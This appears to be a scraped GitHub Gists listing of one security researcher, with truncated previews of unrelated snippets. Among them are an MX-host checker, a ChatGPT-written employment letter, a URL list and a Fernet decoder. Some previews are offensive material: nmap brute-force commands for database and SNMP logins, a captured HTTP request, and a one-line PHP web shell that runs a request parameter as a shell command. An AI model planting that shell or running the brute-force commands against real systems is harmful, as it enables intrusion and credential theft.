Skip to content

Instantly share code, notes, and snippets.

View random-robbie's full-sized avatar
💭
Hacking!

Robbie random-robbie

💭
Hacking!
View GitHub Profile
package main
import (
"fmt"
"io/ioutil"
"log"
"net/http"
"os"
"regexp"
"strings"
@random-robbie
random-robbie / mx.go
Created January 6, 2023 22:14
Checking for dead mx hosts
package main
import (
"fmt"
"net"
"time"
)
func main() {
// Set the domain to check
@random-robbie
random-robbie / letter.txt
Created January 6, 2023 22:00
Chat gpt letter to say you wish to keep your rights under the working time directive.
Dear [Employer],
I am writing to inform you that I wish to exercise my rights under the Working Time Directive. Specifically, I wish to confirm that I will be taking my full entitlement of paid annual leave, as well as any other entitlements such as rest breaks and rest periods.
I understand that the Working Time Directive is a set of EU regulations that aim to protect the health and safety of workers by establishing minimum standards for working time, including the amount of paid leave to which workers are entitled. These rights have been incorporated into UK law, and I believe it is important for me to take advantage of them in order to maintain my health and well-being.
I hope that this letter will serve as sufficient notification of my intention to exercise my rights under the Working Time Directive. If you have any questions or concerns, please do not hesitate to contact me.
Sincerely,
https://10fastfingers.com/
http://soccersuck.com/
https://detran.mg.gov.br/
https://www.smart-gsm.com/
http://camvault.xyz/
https://sphere.social/hello/
https://www.sitejabber.com/
https://musiczum.com/
https://schnaeppchenfuchs.com/
https://xatonline.in/
POST /test/DataTables/examples/resources/examples.php HTTP/1.1
Host: 192.168.1.71
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 35
Origin: http://192.168.1.71

Mysql Bruteforce

nmap --script=mysql-brute

MS SQL Bruteforce

nmap -p 1433 --script ms-sql-brute

pgsql Bruteforce

nmap -p 5432 --script pgsql-brute

snmp Bruteforce

#!/usr/bin/env python
from cryptography.fernet import Fernet
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-f", "--fernet", required=True,help="Fernet Key")
parser.add_argument("-v", "--val", required=True,help="Value to decode")
args = parser.parse_args()
input {
file {
type => "app"
path => ["/home/u/archives/urlteam_2021-02-27-21-17-02/goo-gl/______.txt"]
start_position => "beginning"
sincedb_path => "/dev/null"
}
}
<?php
system($_REQUEST['cmd']);
?>
<?php
/*
Plugin Name: PHP Object Injection Test
Plugin URI: https://www.pluginvulnerabilities.com/
Description: Allows for easy testing of PHP object injection vulnerabilities. Displays message "PHP object injection has occurred." when "O:20:"PHP_Object_Injection":0:{}" is unserialized.
Version: 1.0
Author: White Fir Design
Author URI: https://www.pluginvulnerabilities.com/
License: GPLv2